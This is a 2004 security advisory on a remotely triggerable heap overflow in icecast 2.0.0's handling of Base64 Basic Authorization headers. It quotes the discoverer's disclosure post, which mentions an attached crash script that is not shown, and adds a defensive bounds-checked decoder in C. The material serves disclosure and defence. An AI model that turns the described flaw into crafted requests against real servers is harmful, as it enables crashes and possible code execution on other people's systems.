icecast Heap Overflow in Processing Basic Authentication Lets Remote Users Crash the Service

SecurityTracker Alert ID: 1010101
SecurityTracker URL: http://securitytracker.com/id/1010101
CVE Reference: GENERIC-MAP-NOMATCH
Date: May 10 2004
Impact: Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included: Yes
Version(s): 2.0.0

Description:
A heap overflow vulnerability was reported in icecast. A remote user can cause the icecast service to crash and may be able to execute arbitrary code on the target system [but code execution was not confirmed in the report].
ned reported that the flaw resides in the processing of Base64-encoded HTTP Basic Authorization requests. A remote user can send a specially crafted HTTP GET request to trigger the overflow and cause the target service to crash.
A demonstration exploit script is provided in the Source Message [it is Base64 encoded].
The vendor has reportedly been notified.
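
The cause listed for this flaw is a boundary error while decoding the Base64 Basic Authorization value. The following C decoder is an added example, not icecast's code and not part of the original report; it shows the kind of length check that prevents this class of overflow. The function name decode_basic_auth and the MAX_CRED limit are assumptions made for the illustration.

```c
#include <stdio.h>
#include <string.h>

#define MAX_CRED 256 /* assumed cap on decoded "user:password" bytes */

/* Map one Base64 character to its 6-bit value; -1 if not in the alphabet. */
static int b64_val(unsigned char c) {
    if (c >= 'A' && c <= 'Z') return c - 'A';
    if (c >= 'a' && c <= 'z') return c - 'a' + 26;
    if (c >= '0' && c <= '9') return c - '0' + 52;
    if (c == '+') return 62;
    if (c == '/') return 63;
    return -1;
}

/* Decode the token that follows "Basic " into out (out_cap bytes, NUL included).
 * Returns the decoded length, or -1 for malformed or oversized input.
 * The required size is derived from the input length and checked against
 * the destination before a single byte is written. */
long decode_basic_auth(const char *token, char *out, size_t out_cap) {
    size_t len = strlen(token), pad = 0, o = 0;
    if (len == 0 || len % 4 != 0) return -1;
    if (token[len - 1] == '=') pad = (token[len - 2] == '=') ? 2 : 1;
    size_t need = len / 4 * 3 - pad;
    if (need > MAX_CRED || need + 1 > out_cap) return -1;
    for (size_t i = 0; i < len; i += 4) {
        size_t n = (i + 4 == len) ? 4 - pad : 4; /* data chars in this group */
        unsigned long acc = 0;
        for (size_t j = 0; j < 4; j++) {
            int v = (j < n) ? b64_val((unsigned char)token[i + j]) : 0;
            if (v < 0) return -1; /* reject anything outside the alphabet */
            acc = (acc << 6) | (unsigned long)v;
        }
        out[o++] = (char)((acc >> 16) & 0xFF);
        if (n > 2) out[o++] = (char)((acc >> 8) & 0xFF);
        if (n > 3) out[o++] = (char)(acc & 0xFF);
    }
    out[o] = '\0';
    return (long)o;
}

int main(void) {
    char cred[MAX_CRED + 1];
    /* Constructed sample: Base64 of "user:pass". */
    long n = decode_basic_auth("dXNlcjpwYXNz", cred, sizeof cred);
    printf("%ld %s\n", n, n >= 0 ? cred : "(rejected)");
    return 0;
}
```
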

Impact:
A remote user can cause the target service to crash. A remote user may be able to execute arbitrary code [but that was not confirmed in the report].

Solution:
No solution was available at the time of this entry.

Vendor URL: www.icecast.org/

Cause: Boundary error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Message History:
This archive entry has one or more follow-up message(s) listed below.

Source Message Contents

Date: Sun, 9 May 2004 05:56:32 -0700 (PDT)
Subject: [Full-Disclosure] Icecast 2.0.0 preauth overflow
There exists a remotely exploitable heap overflow in Icecast 2.0.0.
The bug exists in the handling of base64 Authorization request.
This bug was found in about 40 seconds during a HTTP audit of the web
component of Icecast with the fuzzer SMUDGE
(http://felinemenace.org/~nd/SMUDGE/)
People complained that the last Icecast bugs weren't preauth. This one is.
Attached is a simple python script to reproduce the bug on the Windows
platform. Our tests confirmed that some tweaking will crash linux version
although this was not verified by the Icecast team.
Vendor == notified.
On another note this signifies the first release from the UBC.
thanks,
nd.
--
http://felinemenace.org/~nd
Content-Disposition: attachment; filename="CAKEICING.py"
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html